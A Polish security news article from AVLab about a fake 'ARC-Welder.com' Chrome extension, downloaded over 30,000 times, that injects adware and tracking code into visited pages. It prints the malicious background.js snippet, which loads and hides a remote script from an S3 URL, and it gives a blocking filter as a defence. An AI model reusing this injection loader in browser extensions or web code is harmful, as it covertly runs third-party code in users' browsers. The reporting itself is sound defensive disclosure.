Tysiące programistów dało się nabrać na złośliwe narzędzie deweloperskie ARC Welder

2 lipca, 2018

ARC Welder to plugin do przeglądarki Google Chrome, które po zainstalowaniu daje możliwość uruchomienia dowolnej aplikacji z pliku APK. To prawdziwe rozszerzenie „ARC Welder” znajduje się pod tym linkiem i ma prawie milion pobrań. Najciekawsze jest to, że nie jest ono dostępne w wyszukiwarce Google. Wartość meta-tagu <content=”noindex”> powoduje, że słowa kluczowe nie są indeksowane. Natomiast indeksowane jest za to wątpliwej jakości i pobrane ponad 30 tysięcy razy rozszerzenie ARC-Welder.com, które zawiera wbudowany złośliwy kod.

ARC Welder prawdziwe i fałszywe

Na Reddicie zauważono, że ARC-Welder.com wstrzykuje do każdej odwiedzanej strony internetowej zobfuskowanym w pliku background.js kod JavaScript, który jest pobierany z serwerów Amazona:

(function(){var script=document.createElement("script");script.src="///s3.amazonaws.com/js-cache/1bbe2f4535e7dfb295.js";document.head.appendChild(script);document.head.removeChild(script)})();

Użytkownik, który zainstalował to rozszerzenie może się spodziewać dziesiątek lub setek odwołań do dziwnych domen wyświetlających reklamy i zawierających kod śledzenia. Pełny odszyfrowany kod pliku background.js jest dostępny tutaj. Na samym końcu tego pliku widzimy dodatkowo taką informację:

(…) development is supported by <b>optional</b> advertisements that are added to some of the websites you visit. During the development of this extension, I\’ve put in thousands of hours adding features, fixing bugs and making things betternot mentioning the support of all the users who ask for help.<br><br>Ads support most of the internet we all use and love; without them, the internet we have today would simply not exist. Similarly, without revenue, this extension (and the upcoming new ones) would not be possible.<br><br><b>You can disable these ads now or later in the settings page. You can also minimize the ads appearance by clicking on partial support button. Both of these options are available by clicking \’x\’ button in the corner of each ad.</b> In both cases,your choice will remain in effect unless you reinstall or reset the extension (…)

Identyczną wiadomość wykorzystano 2 lata temu w podobnej kampanii wyświetlającej reklamy w innym rozszerzeniu i nie jest wykluczone, że za oba dodatki do przeglądarek odpowiada ten sam autor.

Walka z reklamami nie jest trudna. Wszystkie topowe przeglądarki wspierają genialne rozszerzenie uBlock Origin, które rekomendujemy do instalacji użytkownikom niezależnie od wykonywanej na komputerze pracy. Jeśli jesteś deweloperem i korzystasz z ARC Welder, powinieneś dodać do blokowanych filtrów ten skrypt: s3.amazonaws.com/js-cache/1bbe2f4535e7dfb295.js

Czy ten artykuł był pomocny?

Oceniono: 0 razy

Picture of Adrian Ścibor

Adrian Ścibor

W ramach działań związanych z cyberbezpieczeństwem odpowiada w AVLab za przeprowadzanie testów rozwiązań ochronnych przed zagrożeniami. Opracowuje strategie oraz narzędzia, które pomagają w ochronie danych i systemów przed cyberatakami. Współuczestnik międzynarodowej grupy non-profit AMTSO, która zrzesza ekspertów IT.
Picture of Adrian Ścibor

Adrian Ścibor

W ramach działań związanych z cyberbezpieczeństwem odpowiada w AVLab za przeprowadzanie testów rozwiązań ochronnych przed zagrożeniami. Opracowuje strategie oraz narzędzia, które pomagają w ochronie danych i systemów przed cyberatakami. Współuczestnik międzynarodowej grupy non-profit AMTSO, która zrzesza ekspertów IT.

PODZIEL SIĘ:

guest
0 komentarzy
najstarszy
najnowszy oceniany
Inline Feedbacks
View all comments

Zapisz się na newsletter

Informacje o cyberbezpieczeństwie prosto na skrzynkę pocztową!

Dodatkowo otrzymasz poradnik „Jak bezpiecznie funkcjonować w cyfrowym świecie”

Wyrażam zgodę na przesłanie oferty drogą telefoniczną przez IT Partners security sp. z o.o. z siedzibą Katowicach ul.Padereskiego 35 na podany przeze mnie adres e-mail zgodnie z ustawą z dnia 10 maja 2018 roku o ochronie danych osobowych (Dz. Ustaw z 2018, poz. 1000) oraz zgodnie z Rozporządzeniem Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (RODO).

Wyrażam zgodę na przesłanie oferty drogą mailową przez IT Partners security sp. z o.o. z siedzibą Katowicach ul.Padereskiego 35 na podany przeze mnie adres e-mail zgodnie z ustawą z dnia 10 maja 2018 roku o ochronie danych osobowych (Dz. Ustaw z 2018, poz. 1000) oraz zgodnie z Rozporządzeniem Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (RODO).

[ninja_tables id=”27481″]